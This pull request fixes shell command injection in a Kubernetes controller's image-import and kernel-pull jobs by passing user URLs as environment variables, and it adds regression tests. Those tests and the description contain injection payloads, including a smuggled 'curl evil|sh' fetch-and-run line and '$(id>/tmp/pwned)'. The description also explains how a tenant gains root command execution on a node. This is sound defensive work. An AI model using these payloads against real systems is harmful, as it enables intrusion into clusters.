### PR TITLE
fix(controller): stop building import/pull shell scripts by string interpolation

### DIFF
--- a/internal/controller/swiftimage/import.go
+++ b/internal/controller/swiftimage/import.go
@@ -35,15 +35,23 @@ const (
 // (Windows has no GRUB — it boots bootmgfw from the ESP and manages serial via
 // EMS/SAC in the operator-prepped image), keeping only the OS-agnostic
 // qcow2->raw convert + size measurement. (Windows guest support — PR 3.)
-func importScript(sourceURL, sourceFormat, osType string) string {
+// The source URL is NOT interpolated into the script. It is passed to the
+// container as SOURCE_URL and referenced as "$SOURCE_URL", because the shell
+// does not re-evaluate the CONTENTS of a variable it expands — so a URL
+// containing $(...) or backticks is inert. Interpolating it (even via %q, which
+// escapes " and \ but NOT $ or `) put attacker-controlled command substitution
+// inside a root, privileged container.
+const importSourceURLEnv = "SOURCE_URL"
+
+func importScript(sourceFormat, osType string) string {
 	base := importVolumeMountPath
 	source := base + "/" + importSourceFile
 	output := base + "/" + importOutputFile
 	grubPatch := grubPatchBlock(osType)
 	if sourceFormat == "qcow2" {
-		return fmt.Sprintf("set -e\nOUTPUT=%q\napt-get update -qq && apt-get install -y -qq curl qemu-utils util-linux >/dev/null\ncurl -fsSL -o %q %q\nqemu-img convert -f qcow2 -O raw %q \"$OUTPUT\"%s\nstat -c %%s \"$OUTPUT\" > \"$OUTPUT.size\"\necho \"Image size: $(cat $OUTPUT.size) bytes\"", output, source, sourceURL, source, grubPatch)
+		return fmt.Sprintf("set -e\nOUTPUT=%q\nSRC=%q\napt-get update -qq && apt-get install -y -qq curl qemu-utils util-linux >/dev/null\ncurl -fsSL -o \"$SRC\" \"$%s\"\nqemu-img convert -f qcow2 -O raw \"$SRC\" \"$OUTPUT\"%s\nstat -c %%s \"$OUTPUT\" > \"$OUTPUT.size\"\necho \"Image size: $(cat $OUTPUT.size) bytes\"", output, source, importSourceURLEnv, grubPatch)
 	}
-	return fmt.Sprintf("set -e\nOUTPUT=%q\napt-get update -qq && apt-get install -y -qq curl util-linux >/dev/null\ncurl -fsSL -o \"$OUTPUT\" %q%s\nstat -c %%s \"$OUTPUT\" > \"$OUTPUT.size\"\necho \"Image size: $(cat $OUTPUT.size) bytes\"", output, sourceURL, grubPatch)
+	return fmt.Sprintf("set -e\nOUTPUT=%q\napt-get update -qq && apt-get install -y -qq curl util-linux >/dev/null\ncurl -fsSL -o \"$OUTPUT\" \"$%s\"%s\nstat -c %%s \"$OUTPUT\" > \"$OUTPUT.size\"\necho \"Image size: $(cat $OUTPUT.size) bytes\"", output, importSourceURLEnv, grubPatch)
 }
 
 // grubPatchBlock is the shell that loop-mounts a Linux disk image and injects
@@ -179,7 +187,7 @@ func (r *SwiftImageReconciler) importHTTP(ctx context.Context, img *imagev1alpha
 	// Per-guest disk sizing happens during the root disk clone step.
 	sourceURL := img.Spec.Source.HTTP.URL
 	sourceFormat := string(img.Spec.Format)
-	script := importScript(sourceURL, sourceFormat, string(img.Spec.OSType))
+	script := importScript(sourceFormat, string(img.Spec.OSType))
 	// The import Job needs privileged ONLY for the loop-mount the Linux GRUB
 	// serial-console patch performs. Windows skips that patch (no GRUB), so its
 	// import runs unprivileged (Design Principle: no privileged unless required).
@@ -199,6 +207,9 @@ func (r *SwiftImageReconciler) importHTTP(ctx context.Context, img *imagev1alpha
 						Name:    "import",
 						Image:   "ubuntu:22.04",
 						Command: []string{"sh", "-c", script},
+						// The user-supplied URL rides as an env var, never spliced
+						// into the script text.
+						Env: []corev1.EnvVar{{Name: importSourceURLEnv, Value: sourceURL}},
 						SecurityContext: &corev1.SecurityContext{
 							// Privileged only for the Linux GRUB-patch loop-mount;
 							// false for Windows imports (no patch, no mount).

--- a/internal/controller/swiftimage/import_injection_test.go
+++ b/internal/controller/swiftimage/import_injection_test.go
@@ -1,0 +1,35 @@
+package swiftimage
+
+import "strings"
+
+import "testing"
+
+// The source URL must never appear in the script text. It is delivered as an
+// env var and dereferenced as "$SOURCE_URL", so shell metacharacters in it are
+// inert: the shell does not re-scan the value of a variable it expands.
+//
+// Regression: the script was built with fmt.Sprintf("%q"), which escapes " and
+// \ but NOT $ or backticks — and the result sat inside shell double quotes, so
+// a URL like https://x/$(id) executed inside a root, privileged container.
+func TestImportScript_DoesNotInterpolateSourceURL(t *testing.T) {
+	payloads := []string{
+		`https://x/$(id>/tmp/pwned)`,
+		"https://x/`whoami`",
+		`https://x/${IFS}evil`,
+		`https://x/"; curl evil|sh; echo "`,
+	}
+	for _, format := range []string{"qcow2", "raw"} {
+		for _, osType := range []string{"linux", "windows"} {
+			script := importScript(format, osType)
+			for _, p := range payloads {
+				if strings.Contains(script, p) {
+					t.Errorf("format=%s os=%s: script interpolates the URL %q", format, osType, p)
+				}
+			}
+			// It must dereference the env var instead.
+			if !strings.Contains(script, `"$`+importSourceURLEnv+`"`) {
+				t.Errorf("format=%s os=%s: script does not read $%s: %s", format, osType, importSourceURLEnv, script)
+			}
+		}
+	}
+}

--- a/internal/controller/swiftkernel/pull.go
+++ b/internal/controller/swiftkernel/pull.go
@@ -38,15 +38,24 @@ func pullJobName(skName, nodeName string) string {
 	return base[:40] + "-" + suffix
 }
 
+// pullImageEnv carries the user-supplied OCI reference to the pull container.
+// It is NOT interpolated into the script: the shell does not re-evaluate the
+// contents of a variable it expands, so a reference containing $(...) or
+// backticks is inert. Interpolating it (even via %q, which escapes " and \ but
+// NOT $ or `) put attacker-controlled command substitution inside a root
+// container holding a node hostPath mount.
+const pullImageEnv = "OCI_IMAGE"
+
 // pullScript returns a shell script that pulls OCI artifacts into destDir.
-func pullScript(image, destDir string) string {
+// destDir is controller-derived (KernelLocalPath), not user input.
+func pullScript(destDir string) string {
 	return fmt.Sprintf(`set -e
 mkdir -p %q
 cd %q
-oras pull %q
+oras pull "$%s"
 echo "Pull complete"
 ls -lh .`,
-		destDir, destDir, image)
+		destDir, destDir, pullImageEnv)
 }
 
 // StartPullOnNode creates the pull Job for the SwiftKernel scheduled on the given node.
@@ -56,7 +65,7 @@ func (r *SwiftKernelReconciler) StartPullOnNode(ctx context.Context, sk *kernelv
 	}
 	jobName := pullJobName(sk.Name, nodeName)
 	destDir := kernelv1alpha1.KernelLocalPath(sk.Namespace, sk.Name)
-	script := pullScript(sk.Spec.OCIRef.Image, destDir)
+	script := pullScript(destDir)
 
 	podSpec := corev1.PodSpec{
 		NodeSelector: map[string]string{
@@ -71,6 +80,7 @@ func (r *SwiftKernelReconciler) StartPullOnNode(ctx context.Context, sk *kernelv
 			Name:    "pull",
 			Image:   orasImage,
 			Command: []string{"sh", "-c", script},
+			Env:     []corev1.EnvVar{{Name: pullImageEnv, Value: sk.Spec.OCIRef.Image}},
 			VolumeMounts: []corev1.VolumeMount{{
 				Name:      "kernels",
 				MountPath: kernelHostBasePath,

--- a/internal/controller/swiftkernel/pull_injection_test.go
+++ b/internal/controller/swiftkernel/pull_injection_test.go
@@ -1,0 +1,22 @@
+package swiftkernel
+
+import (
+	"strings"
+	"testing"
+)
+
+// Same defect class as the SwiftImage HTTP import: the OCI reference used to be
+// interpolated with %q into an `oras pull` line inside `sh -c`, giving a tenant
+// command execution in a root container that mounts /var/lib/kubeswift/kernels
+// from the node.
+func TestPullScript_DoesNotInterpolateImage(t *testing.T) {
+	script := pullScript("/var/lib/kubeswift/kernels/ns-name")
+	for _, p := range []string{"$(", "`", "${IFS}"} {
+		if strings.Contains(script, p) && !strings.Contains(script, `"$`+pullImageEnv+`"`) {
+			t.Fatalf("script may interpolate user input: %s", script)
+		}
+	}
+	if !strings.Contains(script, `oras pull "$`+pullImageEnv+`"`) {
+		t.Fatalf("script does not dereference $%s: %s", pullImageEnv, script)
+	}
+}


### PR DESCRIPTION
Second batch from the security review. **Critical** — independently found by three of the five reviewers.

## The bug

`fmt.Sprintf("%q")` is a *Go* quoter, not a *shell* quoter. It escapes `"` and `\` but leaves `$`, backticks and `${}` untouched — and both scripts placed the result inside shell double quotes before handing it to `sh -c`. Verified by running it:

```
curl -fsSL -o "/data/src.img" "https://x/$(id>/tmp/pwned)`whoami`"
```

Live command substitution. Two call sites:

| Site | Field | Job context |
|---|---|---|
| `swiftimage/import.go:44,46` | `spec.source.http.url` | `RunAsUser: 0` **+ `Privileged: true`** for every non-Windows image |
| `swiftkernel/pull.go:46` | `spec.ociRef.image` | `RunAsUser: 0` + `/var/lib/kubeswift/kernels` **hostPath** mount |

A tenant holding only namespaced `create` on these CRs gets command execution on a node. No pod-create rights needed.

## The fix

The user-controlled value is passed to the container as an **env var** and dereferenced as `"$SOURCE_URL"` / `"$OCI_IMAGE"`. The shell does not re-scan the *contents* of a variable it expands, so metacharacters in the value are inert. This is a smaller change than exec-form argv would be (the scripts also apt-get, convert, and loop-mount) and removes the injection just as completely.

Emitted script after the change:
```
SRC="/data/source.img"
curl -fsSL -o "$SRC" "$SOURCE_URL"
qemu-img convert -f qcow2 -O raw "$SRC" "$OUTPUT"
```

Regression tests assert the payload never appears in the script text and that the script reads the env var.

## Not affected

The **OCI** import path was already correct — it passes the reference as exec-form `Args` to the pull init container. Unchanged.

## Still open (tracked separately)

**SwiftKernel has no validating webhook at all** — absent from `internal/webhook/`, the chart, and `config/webhook/` — so `spec.ociRef.image` gets no admission-time shape check. That is a new webhook package, not a line change.

🤖 Generated with [Claude Code](https://claude.com/claude-code)